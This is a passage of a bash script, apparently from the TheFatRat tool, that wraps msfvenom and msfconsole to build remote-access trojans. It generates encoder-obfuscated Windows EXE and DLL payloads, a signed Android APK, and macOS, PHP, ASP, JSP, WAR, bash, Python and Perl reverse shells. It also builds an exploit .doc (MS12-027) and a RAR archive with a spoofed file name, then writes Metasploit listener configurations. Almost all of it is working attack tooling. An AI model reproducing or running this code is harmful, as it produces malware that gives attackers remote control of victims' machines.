echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - if [ -z "$yourport" ]; then - echo "" - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o $output/$fira.exe - -# Checking if file was created - fileout="$output/$fira.exe" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created and it is stored in : $output/$fira.exe" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '3' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - pldand - echo "" - echo "" - gboor - spinlong - echo "" - echo -e $okegreen "" - echo "[*] Creating RAT payload with msfvenom" - sleep 1 - $msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $output/$fira.apk >>$log /dev/null 2>&1 -#check file - outapk=$output/$fira.apk - if [ ! -f "$outapk" ] - then - echo -e $red "" - echo "There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly" - echo -e $okegreen "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - clear - menu - fi - - echo "[✔] Done!" - echo "[*] Creating a Valid Certificate" - sleep 1 - - #Creating certificate and storing info in logfile - - $keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1 - cerapk=$path/temp/debug.keystore - if [ ! -f "$cerapk" ] - then - echo -e $red "" - echo "There was a problem creating a valid certificate ." - echo -e $okegreen "" - read -rsp $'Press [ENTER] key to return to fatrat menu\n' -n 1 key - clear - menu - fi - - echo "[✔] Done!" - echo "[*] Signing your payload APK" - sleep 1 - $sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $output/$fira.apk androiddebugkey >>$log 2>&1 - echo "[✔] Done!" - - # After signing the apk file , android certificate is not needed anymore - # deleting certificate - - rm $path/temp/debug.keystore - sleep 1 - echo "" - echo -e $okegreen "Do you want to create a listener for this configuration" - echo -e $okegreen "to use in msfconsole in future ?" - echo "" - echo -ne "Choose y/n : ";tput sgr0 - read sel - case $sel in - y|Y|yes|Yes|YES) - echo "" - echo -e $green "Write the name for this config . (ex : payloadapk)" - echo -ne "Filename : ";tput sgr0 - read fname - if [ -z $fname ] - then - svf=$path/config/listeners/payloadapk.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD $payload" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/payloadapk.rc" - else - svf=$path/config/listeners/$fname.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD $payload" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - fi - # Checking if file was created - fileout="$output/$fira.apk" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your payload apk was created and signed , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - ;; - n|N|no|No|NO) - # Checking if file was created - fileout="$output/$fira.apk" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your payload apk was created and signed , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - ;; - *) - echo "Wrong input , returning to Msfvenom menu ." - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - ;; - esac - - elif test $fatrat1 == '4' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > $output/$fira.macho - -# Checking if file was created - fileout="$output/$fira.macho" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - elif test $fatrat1 == '5' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong2 - echo "" - echo "" - $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > $output/$fira.php -# Checking if file was created - fileout="$output/$fira.php" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '6' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > $output/$fira.asp - -# Checking if file was created - fileout="$output/$fira.asp" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '7' - then - echo "" - spinlong - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > $output/$fira.jsp - -# Checking if file was created - fileout="$output/$fira.jsp" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '8' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong2 - echo "" - echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > $output/$fira.war -# Checking if file was created - fileout="$output/$fira.war" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '9' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > $output/$fira.py -# Checking if file was created -fileout="$output/$fira.py" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '10' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > $output/$fira.sh - -# Checking if file was created - fileout="$output/$fira.sh" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '11' - then - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > $output/$fira.pl -# Checking if file was created - fileout="$output/$fira.pl" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '12' - then - echo - echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo "" - echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 - read fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - echo "" - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set PAYLOAD $payload ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" - echo "" - mv ~/.msf4/local/$fira.doc $output/$fira.doc >/dev/null 2>&1 - echo -e $okegreen"" -# Checking if file was created - fileout="$output/$fira.doc" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '13' - then - echo - echo -e $red" Worked on All Windows " - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo -ne $okegreen " Please enter the base name for output files ex: test.zip / test.rar):" ;tput sgr0 - read fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - echo "" - echo -ne $okegreen " Please enter spoofed file name to show ex : stuff.txt :" ;tput sgr0 - read fira2 - if [ -z "$fira2" ] - then - fira2="stuff.txt" - fi - echo "" - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - rm -rf ~/.msf4/local/* >/dev/null 2>&1 - xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payload; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" - echo "" - mv ~/.msf4/local/$fira $output/$fira - -# Checking if file was created - fileout="$output/$fira" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created , and it is located in : $fileout" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '14' - then - - - echo "" - spinlong - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - echo -e $okegreen"" - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - if [ -z "$yourport" ]; then - echo "" - read -p ' Set LPORT: ' yourport - fi - echo "" - read -p ' Please enter the base name for output files : ' fira - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - pldwin - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f dll -o $output/$fira.dll - -# Checking if file was created - fileout="$output/$fira.dll" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created and it is stored in : $output/$fira.dll" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - - - elif test $fatrat1 == '15' - then - clear - menu - else - echo -e " Incorrect Number" - clear - cmsfvenom - fi - -} - -function clisteners() { -clear -echo -e $okegreen" ===================================================================== " -echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | " -echo -e $okegreen" ===================================================================== " -echo -e $red" .____ .__ __ "; -echo " | | |__| _______/ |_ ____ ____ ___________ ______" -echo " | | | |/ ___/\ __\/ __ \ / \_/ __ \_ __ \/ ___/" -echo " | |___| |\___ \ | | \ ___/| | \ ___/| | \/\___ \ " -echo " |_______ \__/____ > |__| \___ >___| /\___ >__| /____ >" -echo " \/ \/ \/ \/ \/ \/ " -echo -e $" >> v1.3 " -echo -e $okegreen" ===================================================================== " -echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " -echo -e $okegreen" ===================================================================== " - echo "" - echo -e $okegreen" [1] Listeners for payload linux" - echo -e " [2] Listeners for payload Windows" - echo -e " [3] Listeners for payload Mac" - echo -e " [4] Listeners for payload Android" - echo -e " [5] Load a saved Listener" - echo -e " [6] Back to Menu " - echo -e " " - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"listener$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fatrat1 - - if test $fatrat1 == '1' #LINUX - then - spinlong - rm temp/*.rc > /dev/null 2>&1 - touch "temp/meterpreter_linux.rc" - echo use exploit/multi/handler > "temp/meterpreter_linux.rc" - pldlnx - echo set PAYLOAD $payload >> "temp/meterpreter_linux.rc" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - spinlong - echo "" - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip - echo "" - read -p ' Set LPORT: ' yourport - invalid1 - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - clisteners - fi - echo set LHOST $yourip >> "temp/meterpreter_linux.rc" - echo set LPORT $yourport >> "temp/meterpreter_linux.rc" - echo set ExitOnSession false >> "temp/meterpreter_linux.rc" - echo exploit -j >> "temp/meterpreter_linux.rc" - echo "" - echo -e $okegreen " Do you want to save this configuration to use in future ?" - echo "" - echo -ne " Choose y/n :" ;tput sgr0 - read svl - case $svl in - y|Y|Yes|YES|yes) - echo "" - echo -e $okegreen " Write the name for this config. (ex: linux-config)" - echo "" - echo -ne $okegreen " Filename : " ;tput sgr0 - read fln - -#empty input then save as default name - if [ -z $fln ] - then - cp $path/temp/meterpreter_linux.rc $list/linux-config.rc >/dev/null 2>&1 - echo " Empty input detected , configuration file as linux-config.rc " - echo " to: $list/linux-config.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select linux-config.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu ." - read continue - clisteners - fi - -#input detected - cp $path/temp/meterpreter_linux.rc $list/$fln.rc >/dev/null 2>&1 - echo " Configuration file saved as $fln.rc " - echo "to: $list/$fln.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select $fln.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; - n|no|No|NO) - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; - - *) - echo "" - echo -e $red " Invalid Input" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; -esac - - elif test $fatrat1 == '2' #Windows - then - spinlong - touch "temp/meterpreter_windows.rc" - echo use exploit/multi/handler >> "temp/meterpreter_windows.rc" - pldwin - echo set PAYLOAD $payload >> "temp/meterpreter_windows.rc" - postexp - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - spinlong - echo "" - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip - echo "" - read -p ' Set LPORT: ' yourport - echo "" - invalid1 - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n " Press [ENTER] key to return to menu ." - read inp - clisteners - fi - echo set LHOST $yourip >> "temp/meterpreter_windows.rc" - echo set LPORT $yourport >> "temp/meterpreter_windows.rc" - echo set AutoRunScript multi_console_command -rc $pe >> "temp/meterpreter_windows.rc" - echo set ExitOnSession false >> "temp/meterpreter_windows.rc" - echo exploit -j >> "temp/meterpreter_windows.rc" - echo "" - echo -e $okegreen " Do you want to save this configuration to use in future ?" - echo "" - echo -ne " Choose y/n :" ;tput sgr0 - read svl - case $svl in - y|Y|Yes|YES|yes) - echo "" - echo -e $okegreen " Write the name for this config. (ex: windows-config)" - echo "" - echo -ne $okegreen " Filename : " ;tput sgr0 - read fln - -#empty input then save as default name - if [ -z $fln ] - then - cp $path/temp/meterpreter_windows.rc $list/windows-config.rc >/dev/null 2>&1 - echo " Empty input detected , configuration file as windows-config.rc " - echo " to: $list/windows-config.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select windows-config.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu ." - read continue - clisteners - fi - -#input detected - cp $path/temp/meterpreter_windows.rc $list/$fln.rc >/dev/null 2>&1 - echo " Configuration file saved as $fln.rc " - echo " to: $list/$fln.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select $fln.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - n|no|No|NO) - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - *) - echo "" - echo -e $red " Invalid Input" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; -esac - - elif test $fatrat1 == '3' #Mac - then - spinlong - rm temp/*.rc > /dev/null 2>&1 - touch "temp/meterpreter_mac.rc" - echo use exploit/multi/handler > "temp/meterpreter_mac.rc" - echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc" - echo -e $okegreen"" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - spinlong - echo "" - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip - echo "" - read -p ' Set LPORT: ' yourport - invalid1 - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n " Press [ENTER] key to return to menu ." - read inp - clisteners - fi - echo set LHOST $yourip >> "temp/meterpreter_mac.rc" - echo set LPORT $yourport >> "temp/meterpreter_mac.rc" - echo set ExitOnSession false >> "temp/meterpreter_mac.rc" - echo exploit -j >> "temp/meterpreter_mac.rc" - echo "" - echo -e $okegreen " Do you want to save this configuration to use in future ?" - echo "" - echo -ne " Choose y/n :" ;tput sgr0 - read svl - case $svl in - y|Y|Yes|YES|yes) - echo "" - echo -e $okegreen " Write the name for this config. (ex: mac-config)" - echo "" - echo -ne $cyan " Filename : " ;tput sgr0 - read fln - -#empty input then save as default name - if [ -z $fln ] - then - cp $path/temp/meterpreter_mac.rc $list/mac-config.rc >/dev/null 2>&1 - echo " Empty input detected , configuration file as mac-config.rc " - echo " to: $list/mac-config.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select mac-config.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu ." - read continue - clisteners - fi - -#input detected - cp $path/temp/meterpreter_mac.rc $list/$fln.rc >/dev/null 2>&1 - echo " Configuration file saved as $fln.rc " - echo " to: $list/$fln.rc" - echo "" - echo -e $yellow "" - echo " To load this configuration press on this menu 5 and select $fln.rc" - echo "" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - n|no|No|NO) - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners - ;; - *) - echo "" - echo -e $red " Invalid Input" - echo -e $okegreen "" - echo -ne $okegreen" Press [ENTER] key to return to menu . " - read continue - clisteners -;; -esac - - elif test $fatrat1 == '4' #Android - then - spinlong - rm temp/*.rc > /dev/null 2>&1 - touch "temp/meterpreter_android.rc" - echo use exploit/multi/handler > "temp/meterpreter_android.rc" - pldand - echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" - echo -e $yellow " Your public IP 